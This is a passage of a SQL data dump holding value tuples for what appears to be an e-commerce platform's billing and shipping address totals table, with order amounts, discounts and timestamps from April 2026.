(1385, 876, '2026-04-03 13:59:49', '2026-04-03 13:59:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1386, 876, '2026-04-03 13:59:49', '2026-04-03 13:59:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1387, 877, '2026-04-03 14:14:46', '2026-04-03 14:14:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1388, 877, '2026-04-03 14:14:46', '2026-04-03 14:14:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1389, 878, '2026-04-03 17:33:26', '2026-04-03 17:33:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1390, 878, '2026-04-03 17:33:26', '2026-04-03 17:33:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 12.0000, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -1012.8000, -1012.8000, 4051.2000, 4051.2000, NULL, '[]', NULL, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1391, 879, '2026-04-03 20:05:55', '2026-04-03 20:05:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1392, 879, '2026-04-03 20:05:55', '2026-04-03 20:05:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1393, 880, '2026-04-03 21:58:15', '2026-04-03 21:58:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1394, 880, '2026-04-03 21:58:15', '2026-04-03 21:58:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1395, 881, '2026-04-04 00:28:10', '2026-04-04 00:28:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1396, 881, '2026-04-04 00:28:10', '2026-04-04 00:28:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1397, 882, '2026-04-04 00:28:18', '2026-04-04 00:28:18', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1398, 882, '2026-04-04 00:28:18', '2026-04-04 00:28:18', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1399, 883, '2026-04-04 02:23:36', '2026-04-04 02:23:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1400, 883, '2026-04-04 02:23:36', '2026-04-04 02:23:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1401, 884, '2026-04-04 04:05:46', '2026-04-04 04:05:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1402, 884, '2026-04-04 04:05:46', '2026-04-04 04:06:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 12.0000, 5064.0000, 5064.0000, 4051.2000, 4051.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -1012.8000, -1012.8000, 4051.2000, 4051.2000, NULL, '[]', NULL, 0.0000, 0.0000, 5064.0000, 5064.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1403, 885, '2026-04-04 05:40:37', '2026-04-04 05:40:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1404, 885, '2026-04-04 05:40:37', '2026-04-04 05:40:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1405, 886, '2026-04-04 05:49:06', '2026-04-04 05:49:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1406, 886, '2026-04-04 05:49:06', '2026-04-04 05:49:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 32.0000, 32.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 32.0000, 32.0000, NULL, '[]', NULL, 0.0000, 0.0000, 32.0000, 32.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1407, 887, '2026-04-04 08:27:00', '2026-04-04 08:27:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1408, 887, '2026-04-04 08:27:00', '2026-04-04 08:27:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1409, 888, '2026-04-04 12:03:26', '2026-04-04 12:03:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1410, 888, '2026-04-04 12:03:26', '2026-04-04 12:03:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1411, 889, '2026-04-04 12:03:32', '2026-04-04 12:03:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1412, 889, '2026-04-04 12:03:32', '2026-04-04 12:03:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1413, 890, '2026-04-04 12:49:58', '2026-04-04 12:49:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1414, 890, '2026-04-04 12:49:58', '2026-04-04 12:49:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1415, 891, '2026-04-04 13:20:29', '2026-04-04 13:20:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1416, 891, '2026-04-04 13:20:29', '2026-04-04 13:20:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1417, 892, '2026-04-04 13:55:57', '2026-04-04 13:55:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1418, 892, '2026-04-04 13:55:57', '2026-04-04 13:55:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1419, 893, '2026-04-04 15:29:25', '2026-04-04 15:29:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1420, 893, '2026-04-04 15:29:25', '2026-04-04 15:29:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1421, 894, '2026-04-04 16:05:39', '2026-04-04 16:05:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1422, 894, '2026-04-04 16:05:39', '2026-04-04 16:05:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1423, 895, '2026-04-04 16:05:44', '2026-04-04 16:05:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1424, 895, '2026-04-04 16:05:44', '2026-04-04 16:05:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1425, 896, '2026-04-04 16:05:45', '2026-04-04 16:05:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1426, 896, '2026-04-04 16:05:45', '2026-04-04 16:05:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1427, 897, '2026-04-04 16:05:46', '2026-04-04 16:05:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1428, 897, '2026-04-04 16:05:46', '2026-04-04 16:05:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1429, 898, '2026-04-04 16:05:47', '2026-04-04 16:05:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1430, 898, '2026-04-04 16:05:47', '2026-04-04 16:05:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
